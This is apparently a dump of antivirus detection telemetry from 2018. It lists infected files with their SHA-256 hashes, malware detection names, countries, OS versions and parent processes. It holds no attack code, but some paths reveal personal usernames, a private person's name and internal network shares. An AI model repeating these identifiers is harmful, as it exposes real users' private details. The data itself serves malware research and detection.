  Row(detection=Row(filename='48660d76765a1cf9b8741baaba0961a6998b70726225527237b021ebecf264ac', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_17.10.2018-22.available\\Avira\\48660D76765A1CF9B8741BAABA0961A6998B70726225527237B021EBECF264AC', filesize=1224000, name='TR/Dropper.Gen.#M300.#R405'), hash='48660d76765a1cf9b8741baaba0961a6998b70726225527237b021ebecf264ac', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T11:10:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155446-b54b07d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155446-B54B07D2', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:54:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-165638-341229a1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-163706-4CB2CFCA\\AVSCAN-20181101-165638-341229A1', filesize=192000, name='ADWARE/ConvertAd.Gen7.#M1.#R1'), hash='dfc2956ea57cc3ad640bf976dce45c775de980e78a5471f479e8507c9bacccfc', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T13:57:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sejarah modul 2018.exe', filepath='E:\\SEJARAH MODUL 2018.exe', filesize=320000, name='W32/Sality.AT.#M1.#R1'), hash='7532c882984b01eb25172808830a989e68219cb039b4f51da366b66de18296a6', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T05:26:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nmworker.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\.micro_miner\\resources\\nvidia\\18\\nmworker.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:58:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-01T08:31:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T07:58:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='9f46b92db2c2ccc0bc9d7adecbb9bc6da88322375d0607a4b6b5610ad7c89120', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries28.10.2018-4.available\\Avira\\9F46B92DB2C2CCC0BC9D7ADECBB9BC6DA88322375D0607A4B6B5610AD7C89120', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='9f46b92db2c2ccc0bc9d7adecbb9bc6da88322375d0607a4b6b5610ad7c89120', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:25:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='da343c443d011a73dc594be01e6d555d8fde1fd2eadfba27a47855aa339522d9', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\DA343C443D011A73DC594BE01E6D555D8FDE1FD2EADFBA27A47855AA339522D9', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='da343c443d011a73dc594be01e6d555d8fde1fd2eadfba27a47855aa339522d9', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:03:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ec8d366c71d8235a1898a02793cba3044de070762d53c334546e79be40ffc34c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-16\\EC8D366C71D8235A1898A02793CBA3044DE070762D53C334546E79BE40FFC34C', filesize=1856000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='ec8d366c71d8235a1898a02793cba3044de070762d53c334546e79be40ffc34c', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-16.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-17.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-18.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-19.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-20.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\archive.zip\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T05:57:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:04:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='video-cours.exe', filepath='G:\\photo\\comptabilité\\la flamme\\VIDEO-COURS.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:51:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-233615-f6d18fdb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2781180c\\AVSCAN-20181031-233236-D97E4C1A\\AVSCAN-20181031-233615-F6D18FDB', filesize=752000, name='APPL/InstallBrain.AH.#M1.#R1'), hash='8502cc35c3059806fdd86988167a5d752984b1e93a8b5df5f6126591cae0ec61', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:36:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\C:\\$RECYCLE.BIN\\S-1-5-21-153897562-1265273997-1534562455-1001\\$R6KQHBJ\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T09:20:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d12841befd786ff23785cc83cbd3e2229244e14adad9b99c0b7545886e945c07', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\D12841BEFD786FF23785CC83CBD3E2229244E14ADAD9B99C0B7545886E945C07', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d12841befd786ff23785cc83cbd3e2229244e14adad9b99c0b7545886e945c07', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:10:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='5e934f7a46d8fdd46bbcc512b4e12d55dc39c6aa56ab224b089320c81e0b3b7e', metadata=Row(cmdline='\\\\\\/Embedding', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-01T16:25:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110910-eceef361', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110910-ECEEF361', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:08:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110119-b19decd7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110119-B19DECD7', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:01:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='filezilla_3.29.0_win64-setup_bundled (2017_11_17 18_28_02 utc).exe', filepath='\\\\?\\C:\\Users\\X\\OneDrive\\resim\\FileHistory\\HACI METİN\\DESKTOP-HINKLEP\\Data\\C\\Users\\HACI METİN\\Downloads\\FileZilla_3.29.0_win64-setup_bundled (2017_11_17 18_28_02 UTC).exe', filesize=8852000, name='PUA/FusionCore.P.#M1.#R1'), hash='d93fd89aa6de8363b364f522c38b171dc2a1d1525b7dd0d2c35fab0428c38255', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:32:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered lacid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lacid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a70a3042b79fab309d8c4c27918d2264c8f48d6169355e45c8fbd8c074c3329a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T14:52:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-143615-33656181', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed5e65bd\\AVSCAN-20181101-141758-9212A372\\AVSCAN-20181101-143615-33656181', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:36:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:38:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110717-deb3c56f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110717-DEB3C56F', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:07:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-112131-4a6b4caf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-112131-4A6B4CAF', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:21:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mynsisextend.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsl9BB7.tmp\\MyNsisExtend.dll', filesize=1024000, name='ADWARE/Adware.Gen7.#M300.#R603137'), hash='48d0191d0dd40ea4e9d0197017cf9cae8a1630162a38392829005adc050e5fad', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\paopaolong4.exe', parentsize=13428940, timestamp='2018-11-01T02:11:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000ad94a', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000ad94a', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:50:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-222527-4f54ff08', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a1245b8e\\AVSCAN-20181101-222503-4BDC1845\\AVSCAN-20181101-222527-4F54FF08', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:25:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ospprearm.exe', filepath='C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\OSPPREARM.EXE', filesize=92000, name='W32/Sality.AT.#M1.#R1'), hash='3970d77e7561da4453d7d37f0c1c480abf2ffa1e002ff5330b31c641c7e1efed', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T05:18:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T03:03:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX00.819\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX00.819\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T17:49:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T12:19:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='непотвърдено 375261.crdownload', filepath='D:\\Games\\Непотвърдено 375261.crdownload', filesize=1824000, name='HEUR/AGEN.1033129.#M1.#R1'), hash='7a4ab0e8e6b1bf62069011dfe0b1fcf89e4e2ea1676a09d37c6abbc4602fc8b4', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1589080, timestamp='2018-11-01T16:23:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='downloader-fuer-htmlfix_setup.exe', filepath='\\\\192.168.178.55\\Archiv\\Archiv_Einzelunternehmen_cispenhofen\\Jupiter_Sicherung\\Tagessicherung\\03.10.2012_Dropbox_backup\\Tausch\\Downloader-fuer-htmlfix_setup.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='1ad3dc1b91444427813e416a12f0860a4dac55c14cf561e4df068c60bc6b2206', metadata=Row(cmdline='\\\\\\\\\\\\\\\\192.168.178.55\\\\\\\\Archiv \\\\\\\\\\\\\\\\192.168.178.97\\\\\\\\Archiv \\\\\\/mir \\\\\\/R:1 \\\\\\/W:1', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\SysWOW64\\Robocopy.exe', parentsize=103936, timestamp='2018-11-01T17:56:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='asal2.exe', filepath='H:\\Lab\\asal2.exe', filesize=5120000, name='W32/Infector.Gen.#M300.#R7863'), hash='3446e4d17f89d73b3c25c7e8560259889ee4f7db15df9fb8dc8efd2a5ae04286', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\malpwt2007\\Malaysia PWT 2018I.exe', parentsize=3497984, timestamp='2018-11-01T03:13:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-164917-db5723dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0219e0d6\\AVSCAN-20181101-160503-1618A0E9\\AVSCAN-20181101-164917-DB5723DD', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:49:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xerces-c_1_6_0.dll', filepath='D:\\AutoCAD2009\\x86\\xerces-c_1_6_0.dll', filesize=1536000, name='W32/Ramnit.A.#M1.#R1'), hash='44d73b70f5bc66adb08c739dd549e80534b79cc3b6a7507b3aea447f58425db0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:42:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res2017042888uu_new[3].exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res2017042888uu_new[3].exe', filesize=576000, name='HEUR/AGEN.1030714.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:37:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gbackspin.exe', filepath='\\?\\J:\\العاب\\Backspin Billiards\\gBackspin.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='21c8d5d8ab3720146da247064b0962589b2c797203ad1dbbe69daa7f13d6c257', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003326-7facc1ae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-003326-7FACC1AE', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:33:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wordpad.exe', filepath='C:\\Program Files\\Windows NT\\Accessories\\wordpad.exe', filesize=4608000, name='TR/Patched.Gen.#M300.#R5151'), hash='0601ec0cf3b4ce7d3f82163520f8ad07a423fd089363108a90e8746e85d64610', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:29:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='e:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T15:28:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xerces-c_1_6_0.dll', filepath='D:\\AutoCAD2009\\x86\\xerces-c_1_6_0.dll', filesize=1536000, name='W32/Ramnit.A.#M1.#R1'), hash='44d73b70f5bc66adb08c739dd549e80534b79cc3b6a7507b3aea447f58425db0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:34:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='6529d7055985765a1451f1add7710218f7be72d22ed68295d9c18754d09f5227', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\6529D7055985765A1451F1ADD7710218F7BE72D22ED68295D9C18754D09F5227', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='6529d7055985765a1451f1add7710218f7be72d22ed68295d9c18754d09f5227', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:52:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T17:24:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-223444-f7be009a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14a73c6c\\AVSCAN-20181101-223216-E24113BB\\AVSCAN-20181101-223444-F7BE009A', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:34:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T14:57:05Z'), dt=datetime.date(2018, 11, 1)),
